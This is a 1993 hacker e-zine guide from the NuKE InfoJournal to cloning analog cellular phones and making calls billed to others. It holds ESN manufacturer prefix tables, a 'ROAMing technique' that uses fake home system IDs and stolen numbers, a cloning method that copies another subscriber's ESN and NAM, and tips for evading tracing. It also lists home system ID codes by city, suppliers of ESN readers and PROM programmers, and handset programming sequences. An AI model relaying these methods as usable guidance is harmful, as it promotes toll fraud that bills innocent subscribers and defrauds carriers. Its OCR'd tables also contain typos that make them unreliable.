Ericsson GE Mobile                       157                9D
Fujitsu                                  133                85
Gateway Telephone                        147                93
General Electric                         146                92
Goldstar Products                        141                8D
Harris                                   137                89
Hitachi                                  132                84
Hughes Network Systems                   164                A4
Hyundai                                  160                A0
Japan Radio Co., Ltd.                    152                98
Kokusai                                  139                8B
Mansoor Electronics                      167                A7
Mobira                                   156                9C
Motorola                                 130                82
Motorola International                   168                A8
Mitsubishi                               134                86
Murata Machinery                         144                90
NEC                                      135                87
Nokia                                    165                A5
Novatel                                  142                8E
OKI                                      129                81
Panasonic (Matsushita)                   136                88
Philips Circuit Assemblies               171                AB
Philips Telecom                          170                AA
Qualcomm                                 159                9F
Samsunq Corp.                            179                B0
Sanyo                                    175                AF
Satellite Technology Services            161                A1
Shintom West                             174                AE
Sony Corp.                               154                9A
Tama Denki Co.                           155                9B
Technophone                              162                A2
Uniden Corp. of America                  172                AC
Uniden Corp. of Japan                    173                AD
Universal Cellular                       149                95
Yupiteru Industries                      163                A3
          uK                                                       E-
          E-   "The _COMPLETE_ Cellular Telephone Hackers Guide    Nu
          Nu                        PART 2                         KE
          KE                The Hacker's Best Tricks"              -N
          -N                       OCRd By                         uK
          uK                    The NuKE Crew                      E-
          E-                                                       Nu

NuKE InfoJournal #7
August 1993

% The ROAMing Technique %

Cellular telephones have a ROAM mode, which indicates that the user is in an
area other than his or her "home" area. This ability allows the user to place
a call in an area away from his own, such as another state, and allows the 
phone to be used when travelling or commuting. However, it is impossible for the
local MTSO to know when an "outsider" is on-line in their area, therefore,
incoming calls are not available when ROAMing unless a Call Following feature
is activated by the cellular carrier.

Cellular carriers have common agreements to cross-bill applicable charges, 
including extra charges for being an "outsider", when a cellular user takes
advantage of the roaming capabilities of a cellular telephone. 

It is possible for a user to make a call when ROAMing and not be billed. The
local area MTSO may put the call through and bill it to the registered user
at a later date, only to learn that the caller was using a stolen number. Keep
in mind that all call information is recorded and can be traced. It is 
possible for the authorities to follow up with the "called" party. The calls
most frequently followed up on are calls repeatedly made to the same number
(the user's home number, family members, friends, etc) and noticeable trends
in calling (calling from the same cell each time, calling at the same time of
day, the same area, etc.) 

The "ROAMing Technique" is frequently used, due to the fact that carriers 
normally will not commit to the time and expense of tracing a call to recoup
the small amount lost on short calls (less than one percent of these calls are
deemed a sufficient loss to be followed up on). 

This method requires the NAME be programmed with a fake SIDH (refer to the 
Home System ID article). This may provide access for a limited time. A smart
hacker knows to ignore any message to contact the cellular carrier. 

% Clone Approach %

A cellular phone can also be reprogrammed to imitate another cellular phone.
This is done for two reasons. First, the owner of two cellular phones does
not want to pay two individual service charges since he only uses one phone at 
a any given time. Secondly, a hacker wants to make free phone calls that will 
be charged to another cellular user. This approach will work until the wrongly
charged user reports these charges to the carrier at the end of the month
when they get their bill. Called numbers will probably be investigated for the

The entire ESN and NAM (MIN components) are required to accomplish cloning.
The NAM parameters of one phone should be programmed into the other. The ESN
PROM of the first should be read and programmed into the second. The idea is
to make both phones appear to the carrier as the same phone. If an ESN of a
particular phone is not known, then a Cellular Service Monitor or ESN Reader
will be necessary. Most cellular service centres will have one or you can
look in at the Buyer's Guide Article. 

Only one phone can be used at any given time. Both phones, will try respond
to incoming calls. The phone that offers the most powerful link will be 
connected to break the connection of the other, weaker phone link. 

Refer to the first part on how to program the ESN/NAM.
          uK                                                       E-
          E-   "The _COMPLETE_ Cellular Telephone Hackers Guide    Nu
          Nu                        PART 3                         KE
          KE                Home System ID Codes (SIDH)"           -N
          -N                       OCRd By                         uK
          uK                    The NuKE Crew                      E-
          E-                                                       Nu

NuKE InfoJournal #7
August 1993

% Home System Identification Codes (SIDH) %


Abilene, TX                    131                422
Aiken, GA                      181                084
Akron, OH                      073                054
Albany, GA                     241                204
Albany, NY                     063                078
Alburquerque, NM               079                110
Alexandra, LA                  243                212
Allentown, PA                  103                008
Alton, IL                      017                046
Altoona, PA                    247                032
Amarillo, TX                   249                422
Anchorage, AK                  251                234
Anderson, SC                   139                116
Anniston, AL                   255                098
Appleton, WI                   217                240
Asheville, NC                  263                246
Ashland, WV                    307                ---
Athens, AL                     203                198
Athens, GA                     041                034
Atlanta, GA                    041                034
Atlantic City, NJ              267                250
Auqusta, GA                    181                084
Aurora, IL                     001                020
Austin, TX                     107                164
Bakersfield, CA                183                228
Baltimore, MD                  013                018
Bangor, ME                     271                254
Baton Rouge, LA                085                106
Battle Creek, MI               403                256
Beaumont, TX                   185                012
Bellingham, WA                 047                006
Beloit, WI                     217                210
Benton Harbor, MI              277                260
Biddeford, ME                  501                484
Billings, MT                   279                262
Biloxi, MS                     281                264
Binghampton, NY                283                266
Birmingham, AL                 113                098
Bishop, CA                     1063               ---
Bismarck, ND                   285                268
Bloomington, IL                255                532
Boise, ID                      289                272
Boston, MA                     007                028
Bradenton, FL                  175                042
Bremerton, WA                  047                006
Bridgeport, CT                 119                088
Bristol, TN                    149                042
Brownsville, TX                451                434
Bryan, TX                      297                280
Buffalo, NY                    003                056
Burlington, NC                 069                144
Burlington, VT                 313                300
Canton, OH                     073                054
Casper, WY                     301                284
Cedar Falls, IA                589                568
Cedar Rapids, IA               303                286
Champaign, IL                  305                532
Charleston, WV                 307                290
Charleston, SC                 127                156
Charlotte, NC                  139                114
Charlottesville, VA            309                292
Chattanooga, TN                161                148
Chicago, IL                    001                020
Cincinatti, OH                 051                014
Clarksville, TN                179                296
Cleveland, OH                  015                054
College Station, TX            297                280
Colorado Springs, CO           045                180
Columbia, SC                   189                182
Columbus, GA                   319                302
Columbus, OH                   133                138
Corpus Christi, TX             191                184
Council Bluffs, IA             137                152
Cumberland, MD                 321                304
Dallas, TX                     033                038
Danville, VA                   323                306
Davenport, IA                  193                186
Dayton, OH                     163                134
Daytona Beach, FL              325                308
Decatur, IL                    327                532
Dennison, TX                   033                038
Denver, CO                     045                058
Des Moines, IA                 195                150
Detroit, MI                    021                010
Dotham, AL                     329                312
Dubuque, IA                    331                314
Duluth, MN                     333                316
Durham, NC                     069                144
Eau Claire, WI                 335                318
Elgin, IL                      001                020
El Paso, TX                    097                092
Elkhart, IN                    549                530
Elmira, NY                     283                266
Enid, OK                       341                324
Erie, PA                       343                326
Eugene, OR                     061                328
Evansville, IN                 197                190
Fairbanks, AL                  ---                1018
Fargo, ND                      347                330
Fayettesville, NC              349                100
Fayetteville, AR               607                342
Flint, MI                      021                010
Florence, AL                   351                334
Florence, SC                   377                350
Fort Collins, CO               045                336
Fprt Launderdale, FL           037                024
Fort Myers, FL                 355                042
Fort Pierce, FL                037                340
Fort Smith, AR                 359                342
Fort Walton Beach, FL          361                344
Fort Wayne, IN                 199                080
Fort Worth, TX                 033                038
Fresno, CA                     153                162
Gainesville, FL                365                348
Gadsden, AL                    363                098
Galveston, TX                  367                012
Glens Falls, NY                063                078
Grand Froks, ND                371                356
Grand Rapids, MI               021                244
Granite City, IL               017                046
Great Falls, MT                373                358
Greeley, CO                    045                360
Green Bay, WI                  217                362
Greensboro, NC                 095                142
Greenville, SC                 139                116
Gulf of Mexica, LA             171                194
Gulfport, MS                   ---                264
Gunterville, AL                203                198
Hagerstown, MD                 381                364
Hamilton, OH                   383                366
Harlingen, TX                  451                434
Harrisburg, PA                 159                096
Hartford, CT                   119                088
Hickory, NC                    385                368
Hilo, HI                       1161               060
Holbrook, AZ                   1027               ---
Honolulu, HI                   167                060
Houma, LA                      387                370
Houston, TX                    035                012
Huntington, WV                 307                196
Huntsville, AL                 203                198
Indianapolis, IN               019                080
Iowa City, IA                  389                286
Jackson, MI                    391                374
Jackson, MS                    205                160
Jacksonville, FL               075                136
Jacksonville, NC               393                376
Janesville, WI                 217                210
Jerseyville, IL                245                586
Johnson City, TN               149                074
Johnstown, PA                  039                032
Joliet, IL                     001                020
Joplin, MO                     401                384
Juneau, AL                     ---                1022
Kalamazoo, MI                  403                386
Kankakee, IL                   001                020
Kansas City, KS/MO             059                052
Kennewick, WA                  ---                500
Killeen, TX                    409                392
Kingsport, TN                  149                074
Knoxville, TN                  093                104
Kokmo, IN                      411                080
LaCross, WI                    413                396
Lafayette, IN                  415                080
Lafayette, LA                  431                414
Lake Charles, LA               417                400
Lakeland, FL                   175                042
Lancaster, PA                  159                096
Lansing, MI                    021                188
Laredo, TX                     419                402
Las Cruces, NM                 097                404
Las Vegas, NV                  211                064
Lawrence, KS                   059                406
Lawton, OK                     425                408
Lewiston, ME                   427                482
Lexington, KY                  213                206
Lihue, HI                      1157               060
Lincoin, NE                    433                416
Little Rock, AR                215                208
Long Branch, NY                173                022
Longview, TX                   229                418
Lorain, OH                     437                054
Los Angeles, CA                027                002
Louisville, KY                 065                076
Lubbock, TX                    439                422
Lynchburg, VA                  441                424
Macon, GA                      443                426
Madison, WI                    217                210
Manchster, NH                  445                428
Mansfield, OH                  447                430
Marchall, TX                   229                418
Mayaguez,                      449                432
Mcallen, TX                    451                434
Medford, OR                    061                436
Melbourne, FL                  175                068
Memphis, TN                    143                062
Miami, FL                      037                024
Midland, TX                    459                422
Millville, NH                  ---                250
Milwaukee, WI                  005                044
Minneapolis, MN                023                026
Mobile, AL                     081                120
Modesto, CA                    233                224
Moline, IL                     193                186
Monroe, LA                     463                440
Monterey, CA                   527                126
Montgomery, AL                 465                444
Moorehead, ND                  ---                330
Muncie, IN                     467                080
Muskegon, MI                   021                448
Nashua, NH                     445                428
Nashville, TN                  179                118
NE Pennsylvania                103                172
New Bedford, MA                119                028
New Brunswick, NY              173                022
New Haven, CT                  119                088
New London, CT                 119                088
New Orleans, LA                057                036
Newport News, VA               083                168
New York, NY                   025                022
Norfolk, VA                    083                168
Ocala, FL                      473                348
Odessa, TX                     475                422
Oklahoma City, OK              169                146
Olympia, WA                    047                006
Omaha, NE                      137                152
Orange County, NY              479                486
Orlando, FL                    175                068
Ottawa, IL                     1177               1178
Oxnard, CA                     027                002
Panama City, FL                483                462
Parkersburg, WV                485                032
Pascagoula, MS                 487                264
Pasco, WA                      ---                500
Pensacola, FL                  361                120
Peoria, IL                     221                214
Petaluma, CA                   031                040
Peterburg, VA                  071                472
Philadelphia, PA               029                008
Phoenix, AZ                    053                048
Pine Bluff, AR                 493                208
Pittsburg, PA                  039                032
Pittsfield, MA                 119                480
Placerville, CA                ---                1080
Ponce, PR                      497                082
Portland, ME                   499                482
Portland, OR                   061                030
Portsmouth, NH                 501                484
Poughkeepsie, NY               503                486
Providence, RI                 119                028
Provo, UT                      091                488
Pueblo, CO                     045                490
Raliegh, NC                    069                144
Rapid City, SD                 511                494
Reading, PA                    103                008
Redding, CA                    513                294
Reno, NV                       515                498
Richland, WA                   517                500
Richmond, VA                   071                170
Roanoke, VA                    519                502
Rockester, NH                  501                484
Rockester, MN                  521                504
Rockester, NY                  117                154
Rockford, IL                   217                506
Sacramento, CA                 129                112
Saginaw, MI                    021                389
Salem, OR                      061                030
Salina, CA                     527                040
Salt Lake City, UT             091                094
San Angelo, TX                 529                510
San Antonio, TX                151                122
San Diego, CA                  043                004
San Francisco, CA              031                040
San Jose, CA                   031                040
San Juan, PR                   227                218
Santa Barbara, CA              531                040
Santa Cruz, CA                 031                126
Santa Rosa, CA                 031                040
Sarasota, FL                   175                142
Savanna, GA                    539                520
Schenectady, NY                063                078
Scranton, PA                   103                172
Seattle, WA                    047                006
Sharon, PA                     089                126
Sheboygan, WI                  543                044
Shreveport, LA                 229                220
Sioux City, IA                 547                528
Sioux Falls, SD                555                540
South Bend, IA                 549                530
Spartanburg, SC                139                116
Spokane, WA                    231                222
Springfield, IL                551                532
Springfield, MO                559                546
Springfield, OH                573                134
Springfield, MA                119                188
St. Cloud, MN                  553                534
St. Joseph, MO                 059                536
St. Louis, MO                  017                046
St. Petersburg, FL             175                042
State College, PA              159                032
Stuebenville, OH               039                032
Stocken, CA                    233                224
Stroudsburg, PA                103                172
Syracuse, NY                   077                086
Tacoma, WA                     047                006
Tallahassee, FL                565                544                           
Tampa, FL                      175                042
Temple, TX                     409                392
Terre Haute, IN                567                080
Texarkana, TX/AR               229                550
Toledo, OH                     021                130
Topeka, KS                     059                552
Trenton, PA                    029                008
Tucson, AZ                     053                140
Tulsa, OK                      111                166
          uK                                                       E-
          E-   "The _COMPLETE_ Cellular Telephone Hackers Guide    Nu
          Nu                        PART 4                         KE
          KE              Buyer's Guide And Publications"          -N
          -N                       OCRd By                         uK
          uK                    The NuKE Crew                      E-
          E-                                                       Nu

NuKE InfoJournal #7
August 1993

[Note:  All suppliers are located in the U.S. except where noted.  If anyone
can supply us with names/address/telephone numbers of cellular component
suppliers outside of North America, please send them to us for inclusion in
the next InfoJournal.  -RS]

% Buyer's Guide %

Active Electronic Components       (* PROM/EPROM/EEPROM Chips *)
Tel (403) 235 5300 (Calgary, AB)   (* PROM/EPROM/EEPROM Programmers *)
Tel (416) 238 8825 (Toronto, ON)   (* EPROM UV Erasers *)
Tel (514) 256 7538 (Montreal, QC)
Tel (613) 728 7900 (Ottawa, ON)
Tel (410) 536 5400 (Baltimore, MD)
Tel (708) 593 6655 (Chicago, IL)
Tel (313) 689 8000 (Detroit, MI)
Tel (516) 471 5400 (New York, NY)
Tel (609) 273 2700 (Atlantic City, NJ)
Tel (408) 727 4550 (San Francisco, CA)
Tel (206) 881 8191 (Seattle, WA)
Tel (617) 932 4616 (Boston, MA)
Tel (800) 363 7601

Allstate Cellular                  (* Phone Distributor *)
2064 North Bush St.
Santa Ana, CA 92706
Tel (714) 547 4663
Fax (714) 547 5089

BP Microsystems                    (* PROM Programmers *)
Tel (714) 461 9430

Bytek Corporation                  (* Test Equipement, PROM Programmers *)
Instruments System Division
508 N.W. 77th Street
Boca Raton, FL 33487-1232
Tel (800) 523 1565
Tel (407) 994 3520
Fax (407) 994 3615

Cellular Enterprises               (* Cellular Phone Dealer *)
Tel (813) 885 7766

Cellular Phone Services, Inc.      (* Phone Repairs *)
Tel (800) 326 7901

Curtis Electro Devices             (* ESN/MIN Readers *)
Tel (800) 332 2790
Fax (415) 964 3574

Communication Consultants Co.      (* Phone Repairs *)
Tel (818) 901 9711

Communication Instruments          (* Cellular Service Monitors *)
Tel (800) 288 8223
Tel (213) 322 3666

Incredible Technologies            (* EPROM Emulator *)
Tel (708) 437 2433

Intronics, Inc.                    (* EPROM Programmers *)
P.O. Box 13723
Edwardsville, KS 66113
Tel (913) 422 2094

JDR Microdevices                   (* PROM/EPROM/EEPROM Chips *)
Tel (800) 538 5000

Johnson Radio Communications       (* Phone Distributor *)
660 Transfer Road
St. Paul, MN 55114
Tel (612) 645 6471

Magnatech Corporation              (* Phone Distributor *)
1005 Parchment Drive, S.E.
Grand Rapids, MI 49506
Tel (616) 942 9548

National Semiconductors            (* PROM/EPROM/EEPROM Chips *)
Tel (408) 721 5000

Needham's Electronics              (* EPROM Programmers *)
4539 Orange Grove Ave
Sacramento, CA 95841
Tel (916) 924 8037

NCI                                (* Cellular Phone Supplier *)
Tel (800) 669 5167
Tel (215) 264 5117

Technical Solutions                (* EPROM Emulators *)
P.O. Box 462101
Garland, TX 75046-2101
Tel (214) 272 9392

TLC Electronics                    (* EPROM Emulators *)
2499 Rice St. Ste 17
St. Paul, MN 55113
Tel (612) 481 0287

% Publications %

2600 Magazine                      (* "The Hacker Quarterly" *)
P.O. Box 752
Middle Island, NY 11953
Tel (516) 751 2600
Fax (516) 751 2608

Cellmark Publishing                (* SIDH Codes, coverage maps, roamer
P.O. Box 261                          instructions *)
Dearborn, MI 48123
Tel (313) 561 3339

Communications Publishing Co.      (* SIDH Codes, coverage maps, area carrier *)
P.O. Box 500
Mercer Island, WA 98040-0500
Tel (206) 232 3464

Nuts and Volts Magazine            (* Contains a plethora of hardware/technical
430 Princeland Court                  resources for the serious hacker *)
Corona, CA 91719
Tel (909) 371 8497
Fax (909) 371 3052
          uK                                                       E-
          E-   "The _COMPLETE_ Cellular Telephone Hackers Guide    Nu
          Nu                        PART 5                         KE
          KE                 Programming Instructions"             -N
          -N                       OCRd By                         uK
          uK                    The NuKE Crew                      E-
          E-                                                       Nu

NuKE InfoJournal #7
August 1993

MAKE                    MODEL
ACT                     9500
ALPINE                  9510
ALPINE                  9511
ALPINE                  9525
ALPINE                  9530
ALPINE                  9550
ALPINE                  9550 portable
ANTEL                   LNX-100/200
ANTEL                   NTX-110/220
ANTEL                   RADIANT 832XL
ANTEL                   RADIANT 950
ANTEL                   RADIANT 950MX
ANTEL                   STR 300, 350, 330 transportable
ANTEL                   STR 500, 550, 900
ANTEL                   STR 700, 770 transportable
ANTEL                   STR 1100 portable
ANTEL                   STR 1300 portable
ARA                     PROMCOMM 1600
AT&T                    1100
AT&T                    1200/1240
AT&T                    1300/1300C
AT&T                    1400
AT&T                    1710 portable
AUDIOVOX                BC20
AUDIOVOX                BC40/BC45
AUDIOVOX                BC55
AUDIOVOX                BC55A
AUDIOVOX                CMT 125
AUDIOVOX                CMT 400
AUDIOVOX                CMT 410
AUDIOVOX                CMT 410A
AUDIOVOX                CMT 500
AUDIOVOX                CMT 550
AUDIOVOX                CMT 600
AUDIOVOX                CMT 1000
AUDIOVOX                CMT 1700/1705
AUDIOVOX                CMT 3000
AUDIOVOX                CTR-1900 transportable
AUDIOVOX                CTX 1500
AUDIOVOX                CTX 2500
AUDIOVOX                CTX 3100
AUDIOVOX                CTX 3100A
AUDIOVOX                CTX 4000
AUDIOVOX                CTX 4500 portable
AUDIOVOX                CTX 5000
AUDIOVOX                MVX 500 portable
AUDIOVOX                PT-300 portable
AUDIOVOX                SP 75/85A
BENTLEY                 BX7
BLAUPUNKT               MT 800AU
BLAUPUNKT               9000
BLAUPUNKT               9010
CITICOMM                MM1000
CLARION                 1100CT
CLARION                 5100CT
CLARION                 3000CT
CLARION                 5200CT
CMTELECOM               AR3800
DIAMONDTEL              MESA 40
DIAMONDTEL              MESA 50
DIAMONDTEL              MESA 52
DIAMONDTEL              MESA 55
DIAMONDTEL              MESA 60 portable
DIAMONDTEL              MESA 60X portable
DIAMONDTEL              MESA 80X portable
DIAMONDTEL              MESA 90X portable
DIAMONDTEL              MESA 92
DIAMONDTEL              MESA 95 transportable
DIAMONDTEL              MESA 99X portable
FUJITSU                 170 protable/364
FUJITSU                 COMM 362
FUJITSU                 COMM II(362A)
FUJITSU                 COMM ILX(364)
FUJITSU                 COMM FX & ST
FUJITSU                 COMM XL
FUJITSU                 F80M-360
GATEWAY                 CP 900 portable
GE                      1000/1500
GE                      2000/2500
GE                      3000/3500
GE                      4000/4500
GE                      EXECUTIVE
GE                      HOTLINE 5000
GE                      HOTLINE 7500
GE                      MINI portable
GE                      MINI II portable
GE                      MONOGRAM
GE                      POCKETFONE
GE                      STAR
GOLDSTAR                GM/GT 5000
GLENAYRE                GL300
GTE                     BRONZE 200
GTE                     BRONZE 300
GTE                     MERCURY 200
GTE                     MERCURY 300
HITACHI                 CR-2110H
HITACHI                 CR-1110H
HITACHI                 CR-211H, 2121H
HARRIS                  4200 celphone
HARRIS                  4400
HARRISON                4600
KENWOOD                 KMP F500/KMP H700
LENEX                   same as ANTEL LX series
LEXUS                   MOTO
LUXCEL                  LXC/LXM/LXT 450
LUXCEL                  LXC/LXM/LXT 600
MEI                     CT2000
MEI                     CT3000
MEI                     HT5000
MESA                    see DIAMONDTEL MESA series
MGA                     100/200
MITSUBISHI              301/401/450/460
MITSUBISHI              500/555/560/600
MITSUBISHI              700/900/3000 portable
MITSUBISHI              800 transportable
MITSUBISHI              1500 transportable
MOBIRA                  300 series, ME 57, ME 57A transportable
MOBIRA                  400 series transportable, 500 series portable
MOTOROLA                750 vers I portable
MOTOROLA                750 vers II portable
MOTOROLA                950 portable
MOTOROLA                950X portable
MOTOROLA                1100
MOTOROLA                1500/1500A
MOTOROLA                1800
MOTOROLA                SCN 2056 (1900)
MOTOROLA                2000
MOTOROLA                2000R
MOTOROLA                2000X
MOTOROLA                2200
MOTOROLA                2600
MOTOROLA                2900
MOTOROLA                3000
MOTOROLA                4000C
MOTOROLA                4000X
MOTOROLA                SCN 2005 (4500L)
MOTOROLA                SCN 2005 (4500XL)
MOTOROLA                5000
MOTOROLA                5000 vers 2
MOTOROLA                6000
MOTOROLA                6000X
MOTOROLA                SLN 2020A (6000XL)
MOTOROLA                SLN 2023A (6800XL)
MOTOROLA                8000BC portable
MOTOROLA                8000BCX portable
MOTOROLA                8000P
MOTOROLA                8000S
MOTOROLA                8000X portable
MOTOROLA                8500XL
MOTOROLA                9000
MOTOROLA                MC 100
MOTOROLA                MC 200
MOTOROLA                MC 300
MOTOROLA                SCN 2005 (MC 400)
MOTOROLA                SCN 2090/2204 (MC 500)
MOTOROLA                PERS TEL (with menu key)
MOTOROLA                PERS TEL (without menu)
MOTOROLA                TT2 transportable
MOTOROLA                TT3 transportable
MOTOROLA                SCN 2090/2204 (TT% transportable)
MOTOROLA                TT22 transportable
MURATA                  CT50/MCT portable
NEC                     1000/3500/5000/7000/4700
NEC                     3700/3800/4500/4600/4800
NEC                     9000/9100 portable
NEC                     P200/P300 portable
NEC                     P400/P600 portable
NOKIA                   101/1000 portable
NOKIA-MOBIRA            LX-11/M-11
NOKIA-MOBIRA            M-10
NOKIA-MOBIRA            P-30 portable
NOKIA-MOBIRA            P4000/PT612
NOVATEL                 AURORA 100/200
NOVATEL                 VTR-8300/9300
NOVATEL                 8305
NOVATEL                 8320
OKI                     ACC 91
OKI                     CSI
OKI                     21/23
OKI                     200/300/400 series
OKI                     610/630/691/692
OKI                     620/693
OKI                     700 portable/ACC91/710/750
OKI                     810 mobile/891 transportable
OKI                     830/900
PANASONIC               3500 portable
PANASONIC               6104EA/6104EC
PANASONIC               6104EB
PANASONIC               CM/TF 800
PANASONIC               EB500/CM500/TP500/EB-T10/EB-C10
PANASONIC               EB3500 portable
PANASONIC               HP600/EBH-30
PANASONIC               6106/6110/EB311/EB362
PIONEER                 PCM 300/500
PIONEER                 PCM 600
PHILIPS                 FM 9210
RADIANT                 see ANTEL
RADIO SHACK             CT 102
RADIO SHACK             CT 200/201
RADIO SHACK             CT 300/301
RADIO SHACK             CT 300 portable
RADIO SHACK             CT 302
RADIO SHACK             CT 1033
RADIO SHACK             CT 100/101
RADIO SHACK             17-8003
RADIO SHACK             8000 series
SHINTOM                 CM 7600
SHINTOM                 CM 8700
SHINTOM                 CM 8800
SHINTOM                 XR2000/7600
SONY                    CM-P11 portable
STS                     CP832
TACTEL                  TACTEL
TECHNOPHONE             PC 105/115/125/135 portable
TECHNOPHONE             PC 205 portable
TECHNOPHONE             MC905A/MC905MKII/MC985A/MC9995
TECHNOPHONE             MC915A
UNIDEN                  CP-900/1000/1050/1100/1200/1500/1900
UNIDEN                  CP-2000/3000/PRES4000GTS/4500GTS
UNIDEN                  5000/6000GTS portable
UNIDEN                  CP-5500 portable
USA CORP                portable
WALKER                  910
WALKER                  portable

% Programming Instructions %

                              ALPINE 9500
                  NAM Type:  Tri-State
              Manufacturer:  Kokusai
                Programmer:  Motorola 1801 -- Celnam, Curtis or Bytek
            ESN Prefix DEC:  150
                       HEX:  96
   ESN, S/N Match Required:  Yes
      Programmable Handset:  No
        Available Channels:  666

       Phone Number Format:  XXX-XXX-XXXX
          Lock Code Format:  XXX

                MIN Option:  Enabled
          Repertory Option:  Enabled
          Handsfree Option:  Enabled or Disabled
          Local Use Option:  Enabled
     End-to-End Signalling:  Enabled
         Horn Alert Option:  Enabled

          System ID Format:  XXXXX
          Preferred System:  A or B
     Access Overload Class:  XX
           Group ID Format:  XX

    Initial Paging Channel:  333 or 334
             Station Class:  00

                Horn Alert:  Aux
           New Unlock Code:  NAM
             System Select:  NAM (AB or BA)

                              ALPINE 9510
                  NAM Type:  Fujitsu
              Manufacturer:  Fujitsu
                Programmer:  Curtis or Bytek
            ESN Prefix DEC:  150
                       HEX:  96
   ESN, S/N Match Required:  YES
      Programmable Handset:  No
        Available Channels:  666

       Phone Number Format:  XXX-XXX-XXXX
          Lock Code Format:  XXX

                MIN Option:  Enabled
          Repertory Option:  Enabled
          Handsfree Option:  Enabled or Disabled
          Local Use Option:  Enabled
     End-to-End Signalling:  Enabled
         Horn Alert Option:  Enabled
          System ID Format:  XXXXX
         Preferred Systems:  A or B
     Access Overload Class:  XX
           Group ID Format:  XX

    Initial Paging Channel:  333 or 334
             Station Class:  00

                Horn Alert:  F + #(Aux)
           New Unlock Code:  NAM
             System Select:  F + 1 + X
                               X=1  (A then B)
                               X=2  (B then A)
                               X=3  (A only)
                               X=4  (B only)
                               X=5  (Home)

                              ALPINE 9511
                 NAM Type:  EEPROM
             Manufacturer:  Fujitsu
               Programmer:  Handset
           ESN Prefix DEC:  150
                      HEX:  96
  ESN, S/N Match Required:  Yes
     Programmable Handset:  Yes
       Available Channels:  832

     Programming Sequence:  Power On
                            F + LOCK
                            POWER OFF
                            POWER ON
                            #626#7764726 (within 10 seconds)
                            HOLD (*) key until tone stops
                            Enter Data for each step then press STOR
                            Press SEND to write data

         System ID Format:  5     XXXXX
         Local Use Option:  1     1
               MIN Option:  1     1
            Mobile Number:  10    XXX-XXX-XXXX
            Station Class:  2     08
   Initial Paging Channel:  3     333 or 334
    Access Overload Class:  2     XX
         Preferred System:  1     0 (B) or 1 (A)
          Group ID Format:  2     XX
                     Lock:  3or4  XXX or XXXX
               Call Timer:  1     4 (see i)
                Auto Lock:  1     1 (see ii)
         Call Restriction:  1     1 (see iii)

                                i. Call Timer - 1  Timer off
                                                2  6-seconds
                                                3  30-seconds
                                                4  60-seconds
                                ii. Auto Lock - 1  Manual Lock, No out
                                                2  Manual Lock, No calls
                                                3  Auto Lock, No out
                                                4  Auto Lock, No calls

                        iii. Call Restriction - 1  No Restriction
                                                2  No Memory Dialing
                                                3  No Long Distance
                                                4  Both 2 and 3
                                                5  Memory Calls only
                                                   ALPINE 9511   NAMS 2,3,4

    Programming Sequences:  Power On
                            Unlock Power (if locked)
                            (F) (7) (NAM Number - 2, 3, or 4)
                            (F) (Lock)
                            Power Off
                            Power On
                            Follow Programming Code and Steps from Top Model

               Horn Alert:  F + # (Aux)
          New Unlock Code:  NAM
            System Select:  F + 1 + X
                              X=1  A then B
                              X=2  B then A
                              X=3  A only
                              X=4  B only
                              X=5  Home

                              ALPINE 9525 and 9530
                 NAM Type:  EEPROM
             Manufacturer:  Fujitsu
               Programmer:  Handset
           ESN Prefix DEC:  150
                      HEX:  96
  ESN, S/N Match Required:  Yes. Manufacturer Prefix + Last 4 or 5 digits
     Programmable Handset:  Yes
       Available Channels:  832

     Programming Sequence:  Power On
                            F + LOCK
                            Power Off
                            Power On
                            # + 626 + # + 7764726 (within 10 seconds)
                            Hold (*) key until tone stops
                            Enter data for each step then press STOR
                            Press SEND to write data

                        # of Digits
         System ID Format:  5     XXXXX
         Local Use Option:  1     1
               MIN Option:  1     1
            Mobile Number:  10    XXX-XXX-XXXX
            Station Class:  2     08 (Mobile) or 14 (Portable)
   Initial Paging Channel:  3     333 or 334
    Access Overload Class:  2     XX
         Preferred System:  1     1(A) or 0(B)
          Group ID Format:  2     XX
              Unlock Code:  3or4  XXX or XXXX
               Call Timer:  1     4 (i)
                Auto Lock:  1     1 (ii)
         Call Restriction:  1     1 (iii)
      System ID Inhibit #:  5     XXXXX
      System ID Inhibit #:  5     XXXXX
      System ID Inhibit #:  5     XXXXX

                         i. Call Timer Increment -  1 Timer Off
                                                    2  6-seconds
                                                    3  30-seconds
                                                    4  60-seconds

                        ii. Auto Lock -  1 Manual Lock, no out
                                         2  Manual Lock, No calls
                                         3  Auto Lock, No out
                                         4  Auto Lock, No calls

                       iii. Call Restriction -  1 No Restriction
                                                2  No Memory Dialing
                                                3  No Long-Distance
                                                4  Both 2 and 3
                                                5  Memory Calls only

NAMS 2-4

     Programming Sequence:  Power On
                            Unlock Power (if locked)
                            F + 7 + NAM 2, 3 or 4
                            F + LOCK
                            Power Off
                            Power On
                            Follow Programming Code and steps from top example.

                              ALPINE 9550 Portable
                 NAM Type:  EEPROM
             Manufacturer:  Fujitsu
               Programmer:  Handset
           ESN Prefix DEC:  150
                      HEX:  96
  ESN/Serial Number Match:  Yes. Manufacturer prefix + last 4 or 5 digits
     Programmable Handset:  Yes
       Available Channels:  832
     Programming Sequence:  Power On
                            F + Lock
                            Power Off
                            Power On
                            # + 626 + # + 7764726 (within 3 seconds)
                            Hold (*) key until tone stops
                            Enter data for each step then press STOR
                            Press SEND to write data

                         # digits
         System ID Format:  5     XXXXX
         Local Use Option:  1     1
               MIN Option:  1     1
            Mobile Number:  10    XXX-XXX-XXXX
            Station Class:  2     14
   Initial Paging Channel:  4     0333 or 0334
    Access Overload Class:  2     XX
         Preferred System:  1     1(A) or 0(B)
          Group ID Format:  2     XX
              Unlock Code:  3or4  XXX or XXXX
               Call Timer:  1     4(i)
                Auto Lock:  1     1(ii)
         Call Restriction:  1     1(iii)

                         i. Call Timer Increment -  1 Timer Off
                                                    2  6-seconds
                                                    3  30-seconds
                                                    4  60-seconds

                        ii. Auto Lock -  1  Manual Lock, no out
                                         2  Manual Lock, No calls
                                         3  Auto Lock, No out
                                         4  Auto Lock, No calls

                       iii. Call Restriction -  1  No Restriction
                                                2  No Memory Dialing
                                                3  No Long-Distance
                                                4  Both 2 and 3
                                                5  Memory Calls only

     Programming Sequence:  Power On
                            Unlock Phone (if locked)
                            F + 7 + NAM 2, 3 or 4
                            F + LOCK
                            Power Off
                            Power On
                            Follow Programming Code and steps from above

          New Unlock Code:  NAM
            System Select:  FCN + 1 + X
                             X=1  AB
                             X=2  BA
                             X=3  A only
                             X=4  B only
                             X=5  Home

Curent status may be reviewed with RCL/ALT + FCN + 1

See SHINTOM 8000 series Programming Instructions.

        ANTEL LENEX LNX100, NTX 110, LNX200 and NTX220
                 NAM Type:  EEPROM
              Manufactuer:  General Electric
               Programmer:  Handset
           ESN Prefix DEC:  146
                      HEX:  92
